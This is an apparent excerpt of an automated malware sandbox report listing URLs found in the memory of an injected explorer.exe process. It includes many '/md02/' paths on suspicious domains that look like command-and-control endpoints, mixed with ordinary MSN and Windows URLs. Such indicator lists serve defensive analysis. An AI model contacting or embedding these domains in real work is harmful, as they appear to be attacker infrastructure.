          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rslotrank.win/md02/www.hecxion.xyz
          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rslotrank.winReferer:
          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saeutah.com
          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saeutah.com/md02/
          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saeutah.com/md02/www.jalaios10.vip
          Source: explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saeutah.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tigajco69.fun
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tigajco69.fun/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tigajco69.fun/md02/www.zruypj169g.top
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tigajco69.funReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/www.piedge-taiko.net
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.com/md02/www.tigajco69.fun
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/www.coinbureau.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/www.j3k7n.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyzReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz/md02/www.vizamag.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyzReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/www.qqkartel88v1.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/www.pittsparking.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.topReferer:
          Source: explorer.exe, 00000004.00000003.8288746486.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11893982088.000000000D56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
          Source: explorer.exe, 00000004.00000003.8288746486.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11893982088.000000000D56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppf
          Source: explorer.exe, 00000004.00000003.8286773947.00000000093FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000093FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.9476192622.00000000093FE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSP
          Source: explorer.exe, 00000004.00000000.6847520157.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8623739115.0000000009440000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000002.11886221151.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8623739115.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.00000000094DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/U
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m
          Source: explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.11887310640.0000000009515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8625098549.0000000009510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8288291072.00000000094F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8626668270.0000000009514000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/W
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/a
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX-dark
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
          Source: explorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA179X84.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1g7bhz.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
